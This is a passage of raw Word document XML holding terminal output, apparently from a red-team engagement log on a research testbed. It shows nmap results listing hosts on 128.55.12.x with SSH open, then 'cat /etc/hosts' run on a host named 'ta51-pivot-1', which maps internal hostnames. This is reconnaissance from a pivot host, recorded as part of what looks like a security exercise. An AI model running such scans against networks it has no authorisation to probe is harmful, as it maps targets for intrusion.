        <w:t>MAC Address: 52:54:00:F0:08:B2 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A818FE8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="677A86B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.229</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628E95E8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1319E26A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630FBD05" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD351B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:CB (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF2BEB5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218B0EE1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.230</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC6A181" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552ED4E9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AAE303" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D3A0F0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:CC (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD1EF87" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63DEF943" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.231</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D7CD7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.075s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B4DD3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11656C1A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF0C9C1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:CD (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278E6AE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73365489" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0655F5E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC63E5C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12531ACE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1937F9F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:B7 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D9496" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53B9EAC6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E70952F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6017EB16" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A2A1FB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CDEBE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:B8 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366A0095" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA51AA4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.236</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBB622" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8704CC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD00D22" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7494911D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:C0 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FF57B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67C9318B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.252</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7E94BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.077s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1CEF14" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640C92A1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51620573" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: D0:67:E5:EC:8D:D2 (Dell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3877FA40" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC82B2F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.253</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332DA449" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790441E2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3360723D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B60CF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:25:65:3E (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DA616" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E297F5F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29083023" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (-0.076s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B7346" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF225FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A8216A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: D4:AE:52:6B:51:40 (Dell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816DCCB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7020FFD5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.149</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D036F09" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.000041s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C79266" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT   STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E481CA2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7F5AED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D01B67" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap done: 256 IP addresses (92 hosts up) scanned in 5.22 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B80813" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1A8994" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211CFA50" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-pivot-1:~$ cat /etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBB992A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.0.1       localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEFD2C0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>127.0.1.1       ta51-pivot-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74D835" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#       The     following       lines   are     desirable       for     IPv6    capable hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76973587" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>::1     localhost       ip6-localhost   ip6-loopback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ED78CD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ff02::1 ip6-allnodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E401495" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ff02::2 ip6-allrouters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B62763D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.186   ta51-pivot-5-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5EE165" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.98    ta51-pivot-4-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9B46F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.183   ta51-pivot-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238BF0E0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.99    ta51-pivot-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA48017" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.113   ta1-theia-replay-adapt-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2CD78" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.75    ta1-cadets-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692149A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.106   ta1-cadets-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D12D246" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.73    ta3-prometheus-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16199C07" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.126   ta1-trace-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F836ECA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.118   ta1-trace-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E28B5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.115   ta1-theia-replay-marple-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAC5BD5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.117   ta1-trace-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4BB711" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.59    ta3-starc-1-dp  kafka-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BB0C52" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.60    ta3-starc-2-dp  kafka-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D49D73" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.61    ta3-starc-3-dp  kafka-3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A921B0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.62    ta3-starc-4-dp  kafka-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7E3FC4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.63    ta3-starc-5-dp  kafka-5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F613273" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.64    ta3-starc-6-dp  kafka-6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED91D26" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.54    ta3-perf-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A401D90" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.58    ta1-fivedirections-translate-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BAE060" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.123   ta1-fivedirections-translate-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243E8C28" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.160   ta1-fivedirections-translate-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E93A6BD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.52    ta3-test-dp     ta3-perf-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517049B8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.79    ta52-ubuntu-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9065D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.57    ta3-perf-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A05F48D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.78    ta52-ubuntu-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6183AC19" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.85    ta1-theia-database-dp</w:t>
      </w:r>
    </w:p>
